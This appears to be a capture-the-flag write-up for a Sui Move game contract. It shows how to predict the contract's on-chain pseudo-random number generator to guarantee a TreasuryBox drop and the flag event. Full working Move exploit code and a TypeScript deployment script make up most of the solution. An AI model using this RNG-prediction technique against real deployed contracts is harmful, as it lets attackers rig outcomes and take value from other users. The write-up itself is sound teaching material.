Step 4

Figure out how to get the flag

Take a look at the smart contract source code

The first step in figuring out how to get the flag is view the source code. The source code was provided was the event and can be viewed here. Navigate to Module.move in the source directory to find the module source code.

The flag

Take a moment to look through the four contracts. Try to locate the get_flag() function.

sources/inventory.move

public entry fun get_flag(box: TreasuryBox, ctx: &mut TxContext) {
    let TreasuryBox { id } = box;
    object::delete(id);
    let d100 = random::rand_u64_range(0, 100, ctx);        
    if (d100 == 0) {
        event::emit(Flag { user: tx_context::sender(ctx), flag: true });
    }
}

We can see that the get_flag() function is in the inventory module. The function is marked as entry which means we are able to call it directly via a script. This time, however, the function requires more than just the TxContext. It also requires box: TreasuryBox.

Treasury Box

The TreasuryBox is struct that can be located in the inventory module. Structs are custom types that hold complex data (or no data at all). Structs can also have special properties: copy, drop, key, store. View the move documentation to learn more about the struct abilities. It is important to note that the Flag event is also represented with a struct.

sources/inventory.move

struct TreasuryBox has key, store {
    id: UID,
}

In order to call the get_flag() function, we need to have a TreasuryBox owned by our account which we pass into the function.

Take some time to find out how to get a TreasuryBox in the modules.

There is another function in the inventory module that creates a TreasuryBox. However, this function is not mark with the entry modifier. It is instead labeled as public(friend). This modifier means that only modules deployed in the same package (transaction) can call this function. We need to find where this function is being called in the modules in order to find out how to create a TreasuryBox.

sources/Inventory.move

public(friend) fun create_treasury_box(ctx: &mut TxContext): TreasuryBox {
    TreasuryBox {
        id: object::new(ctx)
    }
}

The create_treasury_box() function is called in the slay_boar_king() function located in the adventure module. We can see that in this function, the a TreasuryBox is created and then transferred to the caller of the function (line 7, 8).

Sources/Adventure.move

// hero takes their licks
if (fight_result == 1) { // hero won
    hero::increase_experience(hero, 2);

    let d100 = random::rand_u64_range(0, 100, ctx);
    if (d100 == 0) {
        let box = inventory::create_treasury_box(ctx);
        transfer::transfer(box, tx_context::sender(ctx));
    };
};

The bigger picture

Lets take some time to understand the adventure module as a whole.

The adventure contains two public entry functions, slay_boar() and slay_boar_king(). Both of these functions take in a Hero object as input. Without worrying about the Hero object, we can see that the functions emulate a battle between the provided Hero and a boar or boar king.

Both functions use the create_monster() function to create the respective monsters. This function is not defined as public, which means, by default, it is private and can only be called by the other functions in the adventure module. The function takes in a minimum and maximum value for hp (AKA health points), strength, and defense. The function then uses the rand_u64_range() in order to generate random values to create a new Monster object. The function finally returns the newly created Monster object.

The two slay functions then use the internal fight_monster() function to pit the Hero against the Monster. This fight_monster() uses the values of both the Hero and Monster to simulate a battle and declare the outcome:

let rst = 0u64; // 0: tie, 1: hero win, 2: monster win;

Take some time to look at the struct definitions for both the Hero and Monster, and understand what is used to determine the outcome of the battle.

/// Our hero!
struct Hero has key, store {
    id: UID,
    /// Level of the hero.
    level: u64,
    /// Stamina points, once exhausted, the hero can't fight.
    stamina: u64,
    /// Hit points. If they go to zero, the hero can't do anything
    hp: u64,
    /// Experience of the hero. Begins at zero
    experience: u64,
    /// Level of the hero. High level will have more high attributes
    
    /// Attributes of the hero. Increasing with level and weapons.
    strength: u64,
    defense: u64,
    
    /// The hero's inventory
    sword: Option<Sword>,
    armor: Option<Armor>,
}

Sources/Adventure.move

/// A creature that the hero can slay to level up
struct Monster<phantom T> has key {
    id: UID,
    /// Hit points before the boar is slain
    hp: u64,
    /// Strength of this particular boar
    strength: u64,
    /// Defense of this particular boar
    defense: u64,
}

Finally, after digesting the battle mechanics and the attributes of the Monster and Hero objects and looking at the slaying functions, we can conclude the following:

• Successfully laying a boar or boar king will level up the hero 1 or 2 levels respectively

• Regardless of the outcome of the battle, an SlainEvent event is emitted in both functions

• The boar and boar king objects are both deleted after the battle.

• After a successful battle with a boar, there is a 10% chance of the Hero gaining a sword and a 10% chance of the Hero gaining an armor piece. These objects increase the strength and defense of the Hero, which increases the odds of winning battles.

• After a successful battle with a boar king, there is a 1% chance of getting a TreasuryBox.

Take a moment to make sure you can understand how to figure out these conclusions from scanning the modules.

You may have also noticed that even after getting a TreasuryBox, there is only a 1% chance of emitting the Flag event. After the get_flag() function call, the TreasuryBox is destroyed regardless of the Flag event being emitted or not. I don't know about you, but I don't like these odds. Lets take a closer look at how the random numbers are generated in the modules.

Hacking the random number generator (RNG)

We can tell that the random number generation might be a source of weakness in the module due to the warning in the beginning:

sources/random.move

/// @title pseudorandom
/// @notice A pseudo random module on-chain.
/// @dev Warning: 
/// The random mechanism in smart contracts is different from 
/// that in traditional programming languages. The value generated 
/// by random is predictable to Miners, so it can only be used in 
/// simple scenarios where Miners have no incentive to cheat. If 
/// large amounts of money are involved, DO NOT USE THIS MODULE to 
/// generate random numbers; try a more secure way.

We know that all of the random number generation done in the other modules use the rand_u64_range() function. This function generates numbers based on the seed that is generated by the seed() function.

sources/random.move

/// Generate a random integer range in [low, high).
public fun rand_u64_range(low: u64, high: u64, ctx: &mut TxContext): u64 {
    rand_u64_range_with_seed(seed(ctx), low, high)
}

source/random.move

 fun seed(ctx: &mut TxContext): vector<u8> {
        let ctx_bytes = bcs::to_bytes(ctx);
        let uid = object::new(ctx);
        let uid_bytes: vector<u8> = object::uid_to_bytes(&uid);
        object::delete(uid);

        let info: vector<u8> = vector::empty<u8>();
        vector::append<u8>(&mut info, ctx_bytes);
        vector::append<u8>(&mut info, uid_bytes);

        let hash: vector<u8> = hash::sha3_256(info);
        hash
    }

We can see that the seed is generated with the ctx data as well as the uid return from object::new(ctx). By taking a look at the Sui object module as well as the Sui TxContext module (located here), we can see that the object::new() function calls tx_context::new_object() function that shows the ids_created attribute of the TxContext object is what is being used to generate the uid. Now we know how the seed is created.

Since we know how the seed is created, we can use this information to predict the number that will be generated with the random number generator. However, we cannot just use the actual version of the generator to predict the number since that will change the ids_created attribute. We need to create local version of the random number generator that won't affect any of the global attributes like the ids_created attribute.

To do this, we will need to create our own version of the TxContext struct, a local copy of the RNG functions, local copies of all of the library functions that are used during the RNG, and some helpers to help us parse and organize all of the data.

I would also like to thank and give credit to nick0ve to helping provide this solution.

hero_solution/solution.move

//===========================================================================
// Ensure that the flag will be generated by predicting the random number 
// generator
//===========================================================================
public entry fun do_get_flag(box: inventory::TreasuryBox, ctx: &mut TxContext) {
  let ctx_bytes = bcs::to_bytes(ctx);
  let mytx = get_mytx_from_bytes(ctx_bytes);

  let start = 4;
  let end = 1000;
  
  while (start < end) {
    let d100 = rangify(get_rand_ith(&mut mytx, start), 0, 100); // Try the next local RNG

    if (d100 == 0) { // Random number is 0 (as desired)
      advance_rng_count(ctx, start); // Modify TxContext
      break
    };
    start = start + 1;
  };
  inventory::get_flag(box, ctx);
}

//===========================================================================
// Build our own local TxContext from the data of the actual TxContext
//
// This function uses the bcs module to serialize and deserialize the 
// TxContext data
//===========================================================================
fun get_mytx_from_bytes(bytes: vector<u8>): MyTxContext {
  let deserializer = bcs::new(bytes);
  let signer_address = bcs::peel_address(&mut deserializer);
  let tx_hash = bcs::peel_vec_u8(&mut deserializer);
  let epoch = bcs::peel_u64(&mut deserializer);
  let ids_created = bcs::peel_u64(&mut deserializer);
  
  MyTxContext {
      signer: signer_address,
      tx_hash,
      epoch,
      ids_created
  }
}

//===========================================================================
// Apply a range to a given number
//===========================================================================
fun rangify(val: u64, low: u64, high: u64): u64 {
  (val % (high - low)) + low
}

//===========================================================================
// Get random number based on our own local random number generator that is 
// based off the challenge's RNG (random number generator)
// 
// Modifies the MyTxContext's ids_created to simulate the TxContext's 
// ids_created
// 
// Returns the random number
//===========================================================================
fun get_rand_ith(mytx: &mut MyTxContext, i: u64): u64 {
  mytx.ids_created = i;
  let my_uid_bytes = get_slice(derive_id(mytx.tx_hash, i), 0, 20);
  let my_seed = seed(bcs::to_bytes(mytx), my_uid_bytes);
  let my_val = rand_u64_with_seed(my_seed);
  my_val
}

//===========================================================================
// For the given count, advance the RNG that many rounds
// 
// This is to get the actual RNG to the state that we predicted will result
// in the desired number
//===========================================================================
fun advance_rng_count(ctx: &mut TxContext, count: u64) {
  let i = 0;
  while (i < count) {
    advance_rng(ctx);
    i = i + 1;
  };
}

//===========================================================================
// Iterate TxContext's ids_created by creating objects
//===========================================================================
fun advance_rng(ctx: &mut TxContext) {
  let uid = object::new(ctx);
  let _uid_bytes: vector<u8> = object::uid_to_bytes(&uid);
  object::delete(uid);
}

//===========================================================================
// Local version of the RNG seed generator
//===========================================================================
fun seed(ctx_bytes: vector<u8>, uid_bytes: vector<u8>): vector<u8> {

  let info: vector<u8> = vector::empty<u8>();
  vector::append<u8>(&mut info, ctx_bytes);
  vector::append<u8>(&mut info, uid_bytes);

  let hash: vector<u8> = hash::sha3_256(info);
  hash
}

//===========================================================================
// get a portion of a given vector
//===========================================================================
fun get_slice(blob: vector<u8>, start: u64, end: u64): vector<u8> {
  assert!(start <= end, 1337);
  let slice: vector<u8> = vector::empty<u8>();
  let i = start;
  while (i < end) {
    vector::push_back(&mut slice, *vector::borrow(&blob, i));
    i = i + 1;
  };
  slice
}

//===========================================================================
// Local version of the derive_id() function
//===========================================================================
fun derive_id(tx_hash: vector<u8>, creation_num: u64): vector<u8> {
  let id: vector<u8> = vector::empty<u8>();
  vector::append<u8>(&mut id, tx_hash);
  vector::append<u8>(&mut id, bcs::to_bytes(&creation_num));
  let hash: vector<u8> = hash::sha3_256(id);
  hash
}

//===========================================================================
// Local version of the RNG helper
//===========================================================================
fun bytes_to_u64(bytes: vector<u8>): u64 {
  let value = 0u64;
  let i = 0u64;
  while (i < 8) {
    value = value | ((*vector::borrow(&bytes, i) as u64) << ((8 * (7 - i)) as u8));
    i = i + 1;
  };
  return value
}

//===========================================================================
// Local version of the RNG helper
//
// Generate a random u64
//===========================================================================
fun rand_u64_with_seed(_seed: vector<u8>): u64 {
  bytes_to_u64(_seed)
}

//===========================================================================
// Local version of the RNG helper
//
// Generate a random integer range in [low, high).
//===========================================================================
fun rand_u64_range_with_seed(_seed: vector<u8>, low: u64, high: u64): u64 {
  assert!(high > low, ERR_HIGH_ARG_GREATER_THAN_LOW_ARG);
  let value = rand_u64_with_seed(_seed);
  (value % (high - low)) + low
}

This code is also available in the writeup repo for better readability.

Creating a module to level up the hero

Before we are able to exploit the random number generator, we need to need to level up the hero in order to defeat the boar king and get a TreasuryBox.

In order for the hero to have a better chance of defeating a boar king to get the chance to get a TreasuryBox, we need to level up the hero which increases the hero's stats. To level up, we need the hero to have a experience level of least 100. We will can increase the experience level of the hero of repeatedly slaying boars.

Once we can slay the boar king, we are going to exploit the RNG to ensure that we will get a Treasury Box on the first try.

hero_solution/solution.move

//===========================================================================
// Automation to slay boars until the hero has enough xp to level up. Once
// leveled up, the hero will slay boar kings until stamina is out. This
// will most likely be enough to generate a Treasury Box
//===========================================================================
public entry fun level_up_hero(hero: &mut Hero, ctx: &mut TxContext) {
  // Get hero's starting experience
  let hero_xp: u64 = hero::experience(hero);

  // Slay boars in batch of tens until hero has xp >= 100
  while (hero_xp < 100) {
    // Check the hero has enough stamina to battle boar
    assert!(hero::stamina(hero) >= 1, 8);
    adventure::slay_boar(hero, ctx);
    hero_xp = hero::experience(hero); // Get hero's updated experience
  };

  // Level up hero once the hero has enough xp
  hero::level_up(hero);
  
  return
}

//===========================================================================
// Function to slay the king while also exploiting the RNG to ensure we get
// a treasury box
//===========================================================================
public entry fun slay_king(hero: &mut Hero, ctx: &mut TxContext) {
  let ctx_bytes = bcs::to_bytes(ctx);
  let mytx = get_mytx_from_bytes(ctx_bytes);

  let start = 4;
  let end = 1000;
  
  while (start < end) {
    let d100 = rangify(get_rand_ith(&mut mytx, start), 0, 100);
    if (d100 == 0) {
      advance_rng_count(ctx, start-4);
      adventure::slay_boar_king(hero, ctx);
      break
    };
    start = start + 1;
  };
}

Deploying and using solution module

Once we have the solution module , we need a script that will interact with the module. In this challenge, we will also use the script to build and deploy our module automatically rather than manually deploy it.

Below is the script to interact with the module. Take a moment to understand everything that is happening.

import { CertifiedTransaction, Ed25519Keypair, JsonRpcProvider, Network, RawSigner, SuiCertifiedTransactionEffects, SuiExecuteTransactionResponse, SuiObject, SuiObjectInfo, SuiTransactionResponse } from '@mysten/sui.js';
import { execSync } from 'child_process';

import dotenv from "dotenv";
import { exit } from 'process';

const GAS_BUDGET = 1000000;

// Note: Make sure to update the address of the challenge package and the hero object
const HERO_ADDRESS = '0x4cfe1379d54f2826a4ce38dad41e938fa5f5e682';
const MODULE_ADDRESS = '0x498868ec78fcc3b29e3f769e44f1516e895b03f9';

const packagePath = './hero_solution';

async function main () {

  dotenv.config();

  // connect to local RPC server
  const provider = new JsonRpcProvider();
  const keyPair = Ed25519Keypair.deriveKeypair(process.env.RECOVERY_PHRASE || 'hell0')
  const signer = new RawSigner(keyPair, provider);
  // // Uncomment the following line to use faucet  
  // await provider.requestSuiFromFaucet(
  //   await signer.getAddress()
  // );
  console.log(`Signer address: ${await signer.getAddress()}`)

  // Compile and deploy the solution module
  // Note: Make sure to update the addresses of the challenge package before deploying
  const compiledModules: Array<string> = JSON.parse(
    execSync(
      `sui move build --dump-bytecode-as-base64 --path ${packagePath}`,
      { encoding: 'utf-8'}
    )
  );

  // Publish the package

  const publishTxn = await signer.publishWithRequestType({
    compiledModules: compiledModules,
    gasBudget: GAS_BUDGET,
  }) as {
    EffectsCert: {
        certificate: CertifiedTransaction;
        effects: SuiCertifiedTransactionEffects;
    }
  };

  // Get address of publish module
  const events = await provider.getTransactionWithEffects(
    publishTxn.EffectsCert.certificate.transactionDigest
  ) as SuiTransactionResponse;
  const createdModules = events.effects.created;
  if (createdModules == undefined || createdModules.length != 1) {
    console.error('Unexpected number of modules created');
    exit(1);
  }
  const SOLUTION_MODULE_ADDRESS = createdModules[0].reference.objectId;
  console.log(`Solution module address: ${SOLUTION_MODULE_ADDRESS}`);

  // Call function to get treasury box from boar king
  const levelUpTxn = await signer.executeMoveCallWithRequestType({
    packageObjectId: SOLUTION_MODULE_ADDRESS,
    module: 'solution',
    function: 'level_up_hero',
    typeArguments: [],
    arguments: [
      HERO_ADDRESS
    ],
    gasBudget: GAS_BUDGET,
  }) as {
    EffectsCert: {
        certificate: CertifiedTransaction;
        effects: SuiCertifiedTransactionEffects;
    }
  };
  console.log(`Level up transaction:`,  levelUpTxn.EffectsCert.certificate.transactionDigest);

  // Slay the boar king to get the treasury box
  // Call function to get treasury box from boar king
  const slayKingTxn = await signer.executeMoveCallWithRequestType({
    packageObjectId: SOLUTION_MODULE_ADDRESS,
    module: 'solution',
    function: 'slay_king',
    typeArguments: [],
    arguments: [
      HERO_ADDRESS
    ],
    gasBudget: GAS_BUDGET,
  }) as {
    EffectsCert: {
        certificate: CertifiedTransaction;
        effects: SuiCertifiedTransactionEffects;
    }
  };
  console.log(`Slay king transaction:`,  slayKingTxn.EffectsCert.certificate.transactionDigest);

  // Get objects owned by the signer
  let objects = await provider.getObjectsOwnedByAddress(
    await signer.getAddress()
  );

  // Check if the signer has a treasury box
  if (!haveTreasuryBox(objects)) {
    console.log('No treasury box found.');
    console.log(`Try again with a new deployment of the challenge.`);
    console.log(`Exiting...`);
    exit(1);
  }
  console.log('Treasury box found!!')

  // get flag using our custom function that exploits the RNG
  console.log('Getting flag...')
  const flagTxn = await signer.executeMoveCallWithRequestType({
    packageObjectId: SOLUTION_MODULE_ADDRESS,
    module: 'solution',
    function: 'do_get_flag',
    typeArguments: [],
    arguments: [
      getTreasuryBox(objects)
    ],
    gasBudget: GAS_BUDGET,
  }) as {
    EffectsCert: {
        certificate: CertifiedTransaction;
        effects: SuiCertifiedTransactionEffects;
    }
  };
  console.log(`Flag transaction:`, flagTxn.EffectsCert.certificate.transactionDigest);
  
  
  return;
}

// Helper function to check if the signer has a treasury box
const haveTreasuryBox = (objects: SuiObjectInfo[]) => {
  for (const object of objects) {
    if (object.type == `${MODULE_ADDRESS}::inventory::TreasuryBox`) {
      return true;
    }
  }
  return false;
}

// Helper function to get the address of the signer's treasury box
const getTreasuryBox = (objects: SuiObjectInfo[]) => {
  for (const object of objects) {
    if (object.type == `${MODULE_ADDRESS}::inventory::TreasuryBox`) {
      return object.objectId;
    }
  }
  console.log('No treasury box found. Exiting...');
  exit(1);
}

main()

Running this script will output the transaction digest that has the flag event. We can turn confirm this and get credit for the challenge.